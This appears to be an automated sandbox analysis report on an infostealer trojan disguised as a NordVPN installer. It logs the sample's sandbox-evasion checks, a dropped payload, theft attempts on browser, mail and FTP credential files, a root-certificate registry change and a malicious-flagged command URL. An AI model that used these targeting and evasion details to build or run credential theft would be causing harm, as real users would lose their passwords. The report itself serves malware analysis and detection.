Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Window / User API: threadDelayed 901	Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe TID: 3192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe TID: 3192	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe TID: 3192	Thread sleep time: -1784000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe TID: 3192	Thread sleep time: -2016000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe TID: 3192	Thread sleep time: -50280s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe TID: 5296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe TID: 5296	Thread sleep time: -3229000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe TID: 5296	Thread sleep time: -37125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe TID: 5296	Thread sleep time: -38340s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe TID: 5296	Thread sleep time: -901000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Code function: 0_2_05DE6B52 GetSystemInfo,

0_2_05DE6B52

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dw20.exe, 00000007.00000002.2758474814.0000000000479000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: dw20.exe, 00000007.00000002.2758474814.000000000046B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWbQr
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: NordVPNInstaller.exe, 00000000.00000002.2778376127.0000000005B60000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3072073018.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2132954381.0000000006100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: dw20.exe, 00000007.00000002.2758474814.000000000042E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW "G%SystemRoot%\system32\mswsock.dll />
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Code function: 0_2_053D1D68 LdrInitializeThunk,

0_2_053D1D68

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 12572

Jump to behavior

Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (09/01/2024 15:56:22)</span></span><br>
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\FTP Navigator\Ftplist.txt			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: NordVPNInstaller.exe, type: SAMPLE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NordVPNInstaller.exe PID: 3524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bbb.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Process Injection	1 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	131 Security Software Discovery	Distributed Component Object Model	1 Email Collection	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	21 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NordVPNInstaller.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
NordVPNInstaller.exe	57%	Virustotal		Browse
NordVPNInstaller.exe	100%	Avira	TR/Spy.Agent.lkofd
NordVPNInstaller.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\bbb\bbb.exe	100%	Avira	TR/Spy.Agent.lkofd
C:\Users\user\AppData\Roaming\bbb\bbb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\bbb\bbb.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
checkip.dyndns.com	0%	Virustotal		Browse
checkip.dyndns.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://plantain-elk-b8pt.squarespacdzv	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd60	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdVQ	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdNG	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRM	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb_	0%	Avira URL Cloud	safe
http://DynDns.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2&	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRF	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~s	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbY	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdZD	0%	Avira URL Cloud	safe
http://DynDns.com	0%	Virustotal		Browse
https://plantain-elk-b8pt.squarespacdfP	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbB	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdR4	0%	Avira URL Cloud	safe
http://Paltalk.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbE	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdV:	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdZ?	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~c	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdfL	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment	0%	Avira URL Cloud	safe
http://Paltalk.com	2%	Virustotal		Browse
https://plantain-elk-b8pt.squarespacdRj	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdz	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment	0%	Virustotal		Browse
https://plantain-elk-b8pt.squarespacd6T	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdFV	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJZ	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdr	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com	0%	Virustotal		Browse
https://plantain-elk-b8pt.squarespacd2C	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&:	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdv	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&;	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRg	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&.	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespac	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.9	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdn	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdZh	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdVW	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJM	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdf	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdvz	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.3	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:A	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdn&	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&_	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.k	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdBu	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~;	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2g	0%	Avira URL Cloud	safe
https://login.live.c	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.V	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJs	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd6d	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/E	0%	Avira URL Cloud	safe
http://no-ip.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJn	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdFm	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdnI	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb3	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd6	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com$	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb8	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdf/	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&r	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdvB	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.z	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj9	0%	Avira URL Cloud	safe
http://secure.globalsig	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
plantain-elk-b8pt.squarespace.com	198.185.159.177	true	true		unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://plantain-elk-b8pt.squarespacdNG	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd60	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRM	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdVQ	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdzv	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb_	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.com	NordVPNInstaller.exe, bbb.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd2&	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRF	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrf	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd~s	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbY	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZD	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfP	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbB	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdR4	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://Paltalk.com	NordVPNInstaller.exe, bbb.exe.0.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbE	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdV:	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZ?	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~c	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfL	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRj	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdz	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespace.com	NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd6T	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdFV	NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
